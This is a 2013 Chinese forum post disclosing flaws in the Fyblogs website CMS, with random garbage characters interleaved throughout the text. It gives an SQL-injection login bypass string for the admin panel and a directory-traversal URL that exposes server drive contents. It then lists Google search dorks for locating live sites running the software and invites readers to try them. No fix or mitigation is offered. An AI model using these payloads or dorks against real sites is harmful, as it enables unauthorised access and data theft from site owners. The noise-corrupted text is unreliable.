漏洞类型: 未授权访问/权限绕过2 l. i) W2 F# x, {$ F
4 y' p3 R V2 Z3 D- ~0 u, W
简要描述:
0 T5 ~: c$ }. ~) f& C% X( ~, q& k+ C$ W k
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!; J5 v, {: J( l7 O5 ~6 u
/ Q2 \6 ~2 A3 u( ?! f5 ]+ z详细说明:
- U, H! d1 m5 v4 ?3 X. \ k. S# ~5 G+ m
后台万能密码 'or'='or'
1 K( C/ y% x6 V& k8 d: |% r% A后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% {" I- B4 p4 y0 E! C0 Xadmin/uploadfile.asp?currentFolder=/upfiles/..// p& ~( G8 R4 {4 f: O
, `) Z4 x9 K1 x8 e* w3 j漏洞证明:
$ v8 Y0 s! A6 |" l: ^& g# T$ i2 M4 k) U5 i$ l8 e
谷歌:inurl:type.asp?id=1 新闻中心+ @4 Z9 f" L+ A
或者 :inurl:download_ok.asp?# @3 J/ ]" e' X& m T6 W# }8 C2 t
! ]% @+ u2 P; A1 P$ P可以测试9 H9 A6 {* x( t/ _" A! D
% k4 U+ ?' }" T* f9 {% Y V+ \, j {. H5 G. O; Y# H1 I
|
发表于 2013-3-7 13:07:46
收藏
支持
反对